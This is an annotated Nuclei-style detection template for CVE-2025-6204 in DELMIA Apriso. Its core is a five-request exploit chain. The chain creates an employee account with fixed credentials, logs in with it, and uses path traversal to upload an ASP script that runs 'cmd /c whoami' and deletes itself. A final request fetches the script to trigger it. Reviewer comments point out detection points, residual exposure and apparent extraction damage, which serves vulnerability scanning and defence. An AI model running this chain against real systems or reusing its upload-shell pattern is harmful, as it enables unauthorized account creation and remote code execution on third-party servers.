# Nuclei-style template for CVE-2025-6204 in DELMIA Apriso: a five-request
# chain (see `flow`) that ends by fetching a file the template uploaded itself.
# The chain changes state on the target: request 1 submits an employee record
# with fixed credentials and request 4 writes an .asp file under
# portal\Uploads, which is why the `intrusive` tag is set below.
# NOTE(review): the trailing `# digest:` line looks like a signature over this
# file's content; presumably any edit (comments included) requires re-signing
# - confirm with the template tooling before distributing a modified copy.
id: CVE-2025-6204
info:
  # NOTE(review): the name says "Command Injection" while cwe-id (CWE-94) and
  # the description speak of code injection through file upload - align them.
  name: DELMIA Apriso - Command Injection
  author: iamnoooob,rootxharsh,parthmalhotra,pdresearch
  severity: critical
  # NOTE(review): the description assumes an already authenticated user, but
  # request 1 below shows no credentials in its visible headers and provisions
  # the account itself. Presumably that step depends on a separate
  # authorization weakness; stating it here would tell readers that the
  # result reflects the whole chain, not the upload handler alone.
  description: |
    An Improper Control of Generation of Code (code injection / file upload → RCE) vulnerability affecting DELMIA Apriso (Release 2020 → Release 2025). When an authenticated user can upload files and the upload handler fails to canonicalize filenames or enforce storage restrictions, an attacker may place executable artifacts into web-served locations (via path traversal or insufficient normalization) and achieve remote code execution under the webserver context.
  remediation: |
    Apply security patches from DELMIA for Release 2020 through Release 2025 to implement proper file upload validation and path canonicalization.
  impact: |
    Authenticated attackers can upload executable files through path traversal to achieve remote code execution on DELMIA Apriso servers.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-6204
    - https://www.3ds.com/trust-center/security/security-advisories/cve-2025-6204
    - https://projectdiscovery.io/blog/remote-code-execution-in-delmia-apriso
  metadata:
    verified: true
    # Matches the five entries under `http` in this file.
    max-request: 5
    shodan-query: title:"DELMIA Apriso"
  classification:
    cve-id: CVE-2025-6204
    epss-score: 0.10184
    epss-percentile: 0.9332
    cwe-id: CWE-94
    # NOTE(review): this vector evaluates to 9.9 under the CVSS 3.1 formula,
    # not the 9.0 given in cvss-score - one of the two fields is off; confirm
    # against the NVD / vendor advisory listed under `reference`.
    cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
    cvss-score: 9.0
  # `intrusive` lets operators exclude this template from scans that must not
  # modify the target.
  tags: cve,cve2025,delmia,apriso,rce,traversal,upload,intrusive,vuln,kev,vkev
# The five requests run in order and each one gates the next: a step whose
# matcher fails stops the chain, so only a full pass reaches request 5.
flow: http(1) && http(2) && http(3) && http(4) && http(5)
variables:
  # Base name of the uploaded file; presumably five random characters per run.
  filename: "{{randbase(5)}}"
  # NOTE(review): these credentials are fixed. Every target on which request 1
  # succeeds is left with the same known login, and no later step in this file
  # removes the account. Per-run random values (as done for `filename`) that
  # are recorded for cleanup would reduce that residual exposure.
  username: "LAST"
  password: "9"
http:
# Request 1: posts a FlexNet_Employees document to FlexNetMessageProcessor.svc
# that defines an employee with the LoginName/Password from `variables` and
# the role "Production User". No cookie or authorization header appears in the
# visible request.
# NOTE(review): in this copy the blank line between headers and body is
# missing, and no SOAP envelope surrounds the XML (the trailing
# "myExternalApplication" line looks like residue of stripped markup). Restore
# the request from the upstream template before relying on it.
# Defender view: an employee record named FIRST/LAST with EmployeeNo 08262004
# is a concrete artefact to search for on systems that may have been scanned.
- raw:
    - |-
      POST /Apriso/MessageProcessor/FlexNetMessageProcessor.svc HTTP/1.1
      Host: {{Hostname}}
      Content-Type: text/xml;charset=utf-8
      Soapaction: "http://tempuri.org/IFlexNetMessageProcessor/ProcessMessageASync_v2"
      <FlexNet_Employees xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="S:/SchemaRepository/XMLSchemas/FlexNet/FlexNet_Employees.xsd" Version="1.0">
      <Employee>
      <GivenName>FIRST</GivenName>
      <FamilyName>LAST</FamilyName>
      <EmployeeNo>08262004</EmployeeNo>
      <LoginName>{{username}}</LoginName>
      <Password>{{password}}</Password>
      <HireDate>2000-06-01T00:00:00</HireDate>
      <SpokenLanguageID>1033</SpokenLanguageID>
      <WrittenLanguageID>1033</WrittenLanguageID>
      <EmployeeValidDate>2000-06-01T00:00:00</EmployeeValidDate>
      <LoginExpirationDate>9999-12-31T00:00:00</LoginExpirationDate>
      <EmployeeType>0</EmployeeType>
      <DefaultFacility>C1P1</DefaultFacility>
      <TrackLaborFlag>true</TrackLaborFlag>
      <ResourceID NodeType="Field">
      <Resource_Insert>
      <Name>FIRST</Name>
      <ResourceName>FIRST</ResourceName>
      <ResourceType>1</ResourceType>
      <FUID NodeType="Field"/>
      </Resource_Insert>
      </ResourceID>
      <EmployeeRole>
      <EmployeeID NodeType="Field"/>
      <RoleID NodeType="Field">
      <Role>
      <Role>Production User</Role>
      </Role>
      </RoleID>
      </EmployeeRole>
      </Employee>
      </FlexNet_Employees>
      myExternalApplication
  matchers:
    # Internal gate for the flow: the response body must contain both words.
    # NOTE(review): the unquoted `true` below is a YAML boolean, not a string;
    # quote it if the consumer does not coerce it.
    - type: word
      part: body
      words:
        - ProcessMessageASync_v2Response
        - true
      condition: and
      internal: true
# Request 2: fetches the kiosk login page (following redirects) and captures
# the three ASP.NET hidden form fields that request 3 sends back with the
# login POST. All three extractors are internal, i.e. used only as variables.
- raw:
    - |
      GET /Apriso/Portal/Kiosk/Login.aspx HTTP/1.1
      Host: {{Hostname}}
  redirects: true
  extractors:
    # __VIEWSTATE value -> {{viewstate}}
    - type: regex
      part: body
      name: viewstate
      group: 1
      regex:
        - '__VIEWSTATE" value="(.*?)"'
      internal: true
    # __EVENTVALIDATION value -> {{eventval}}
    - type: regex
      part: body
      name: eventval
      group: 1
      regex:
        - '__EVENTVALIDATION" value="(.*?)"'
      internal: true
    # __VIEWSTATEGENERATOR value -> {{viewgen}}
    - type: regex
      part: body
      name: viewgen
      group: 1
      regex:
        - '__VIEWSTATEGENERATOR" value="(.*?)"'
      internal: true
# Request 3: logs in through the kiosk form with the account from request 1,
# replaying the hidden fields captured in request 2. The later requests
# presumably rely on the engine reusing the session cookie set here.
# NOTE(review): the blank line between the headers and the form body is
# missing in this copy.
- raw:
    - |-
      POST /Apriso/Portal/Kiosk/Login.aspx?BackToStartPage=true HTTP/1.1
      Host: {{Hostname}}
      Content-Type: application/x-www-form-urlencoded
      __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE={{urlencode(viewstate)}}&__VIEWSTATEGENERATOR={{viewgen}}&__EVENTVALIDATION={{urlencode(eventval)}}&ctl04%24LoginTextBox={{username}}&ctl04%24PasswordTextbox={{password}}&ctl04%24LogInButton=Log+In&ctl04%24HiddenValue=Initial+Value&ctl04%24HiddenValue2=Initial+Value
  matchers:
    # Internal gate: a 302 is taken as a successful login.
    # NOTE(review): the redirect target is not checked, so any 302 passes
    # this step; request 4 is what fails if no session was established.
    - type: dsl
      dsl:
        - status_code == 302
      internal: true
# Self-deleteable ASP POC File
# Request 4: calls UploadFile with a `filename` parameter whose `\..\..\..\`
# segments walk out of the intended storage directory into portal\Uploads,
# which request 5 then fetches over HTTP. The uploaded script writes a random
# marker, runs `cmd /c whoami` through WScript.Shell, prints the output and
# deletes its own file.
# NOTE(review): the self-delete runs only when the file is executed by
# request 5. If the chain stops after this step, the .asp file stays on disk;
# check portal\Uploads for leftovers after a scan.
# NOTE(review): the string literal after `Response.Write` is split across two
# lines and the header/body blank line is missing - likely extraction damage
# in this copy; compare with the upstream template.
# Detection points visible here: UploadFile requests whose filename contains
# `..\`, new .asp files under Portal\Uploads, and the web server process
# starting cmd.exe.
- raw:
    - |
      POST /Apriso/webservices/1.1/operation.svc/UploadFile?filename=375c9638-1a4e-465d-90d7-f69321315acb-xxx\..\..\..\portal\Uploads\{{filename}}.asp HTTP/1.1
      Host: {{Hostname}}
      Content-Type: application/x-www-form-urlencoded
      <%
      Response.Write "{{randstr}}" & "
      "
      Set rs = CreateObject("WScript.Shell")
      Set cmd = rs.Exec("cmd /c whoami")
      o = cmd.StdOut.Readall()
      Response.write(o)
      Set fso = Server.CreateObject("Scripting.FileSystemObject")
      fso.DeleteFile Server.MapPath(Request.ServerVariables("SCRIPT_NAME")), True
      Set fso = Nothing
      %>
  matchers:
    # Internal gate: the upload response must contain all five words,
    # including the generated file name.
    - type: word
      part: body
      words:
        - Uploads
        - ResultMessage
        - FilePath
        - Success
        - "{{filename}}.asp"
      condition: and
      internal: true
# Request 5: fetches the uploaded file from Portal/Uploads. This is the only
# matcher not marked internal, so it is the one that produces the finding.
- raw:
    - |
      GET /Apriso/Portal/Uploads/{{filename}}.asp HTTP/1.1
      Host: {{Hostname}}
  matchers:
    # NOTE(review): the marker is also present verbatim in the uploaded
    # source, so a server that returns the file as static text (without
    # executing it) would satisfy this matcher too. A negative match on the
    # script source, e.g. `<%`, would separate "file written" from "code
    # executed"; in the static case the self-delete has not run either.
    - type: word
      part: body
      words:
        - "{{randstr}}"
  extractors:
    # Unnamed extractor that reports capture group 1 of `(.*)` over the
    # response. The response carries the `whoami` output of the web server
    # account, so treat scan output from this template as sensitive.
    - type: regex
      group: 1
      regex:
        -
          (.*)
# digest: 490a00463044022033f49e117aa08ba5e980fc2f4bec395a9b4548b131a58e7df61bd2376f63224c022034d38adcafda8610b6a147d319a7d4431d13dd178c8a4e87a9dd7fe81fb31b48:922c64590222798bb761d5b6d8e72950